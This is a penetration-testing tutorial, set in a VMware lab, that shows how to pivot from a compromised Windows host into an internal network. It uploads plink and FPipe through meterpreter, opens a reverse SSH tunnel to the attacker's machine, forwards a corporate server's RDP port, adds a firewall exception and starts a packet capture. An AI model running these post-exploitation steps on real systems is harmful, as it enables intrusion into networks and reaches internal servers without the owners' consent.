Network Pivoting using SSH tunneling and forwarding:
Is Microsoft Network Monitor was installed? If so, depending on which version, you may have to run netmon, netcap, or nmcap, each of which has slightly different features and syntax. For example, if Network Monitor 3 is installed running, you could execute the following command at a shell prompt:
C:\> NMCap /network 1 /capture /file c:\windows\temp\capt.cap /timeafter 10 minutes
… which starts a capture on network 1 writing to the specified location for ten minutes.
Setup used for this tutorial:
Attacker IP: 192.168.1.100
Victim IP: 192.168.1.200 , second NIC 172.16.1.73 (connected to 172.16.1.0/24 network a windows xp pro workstation)
Corporate server IP: 172.16.1.80
I will use a vmware based lab ,all addresses used for this tutorial are internal adresses only.
1. Once we received our meterpreter session on the attacking machine we will first upload our tools, PLINK and FPipe.
meterpreter > upload plink.exe c:\\ [*] uploading : plink.exe -> c:\ [*] uploaded : plink.exe -> c:\\plink.exe meterpreter > upload FPipe.exe c:\\ [*] uploading : FPipe.exe -> c:\ [*] uploaded : FPipe.exe -> c:\\FPipe.exe
2. Open a command prompt:
meterpreter > execute -i -H -f cmd.exe Process 1844 created. Channel 3 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>
3. Create SSH tunnel back to our attacking machine using PLINK
C:\>plink -P 22 -l root -pw qwe123 -C -R 3389:127.0.0.1:1234 192.168.1.100 Last login: Fri Jul 17 19:49:35 2009 from 220.127.116.11 Linux 18.104.22.168. exploit ~ #
plink -P "ssh server port" -l "ssh server user name" -pw "ssh server password" -C -R "local port":127.0.0.1:"remote port" "ssh server ip address"
4. Send command prompt to background by pressing CTRL+Z on the keyboard.
Background channel 3? [y/N] y [-] core_channel_interact: Operation failed: 1168 meterpreter >
* The command prompt is still running on the background and it is still active on the victim machine, you can resume it by typing the command “interact” and the channel number:
meterpreter > interact 3 Interacting with channel 3... exploit ~ #
5. Open a new command prompt channel
meterpreter > execute -i -H -f cmd.exe Process 3472 created. Channel 4 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>
6. Forwarding traffic to the server using FPipe
C:\>Fpipe.exe -l 1234 -s 1234 -r 3389 172.16.1.80
(You can add the -v switch for verbosity, you can also background this channel and continue working with meterpreter)
Let’s take a look at some of the FPipe options used here:
-l – listening port number
-r – remote port number
-s – outbound source port number
If windows firewall blocks this use the following command to allow:
c:\>netsh firewall add portopening TCP 1234 “Name of the exception” enable all
7. RDP to the server machine
before we do that lets verify that our attacking is listening on port 3389.
exploit ~ # netstat -antp | grep 3389 netstat -antp | grep 3389 tcp 0 0 127.0.0.1:3389 0.0.0.0:* LISTEN 3494/4 exploit ~ # rdesktop 127.0.0.1
If everything went well a remote desktop session should open.
Tools used in this tutorial:
Plink is a command-line interface to the PuTTY (the Telnet and SSH client itself) back ends.
FPipe is a source port forwarder/redirector created by foundstone. It can create a TCP or UDP stream with a source port of your choice. This is useful for getting past firewalls that allow traffic with source ports of say 23, to connect with internal servers.
The Metasploit Framework
Other Related Tools
This is a simple TCP/IP socket redirection application that offers a little more complexity than the simple fork-based datapipes that are commonly available. This source has been successfully compiled and used on Linux, FreeBSD, and Win32. I have released it into the public-domain.
WinRelay is a TCP/UDP forwarder/redirector that works with both IPv4 and IPv6. You can choose the port and IP it will listen on, the source port and IP that it will connect from, and the port and IP that it will connect to.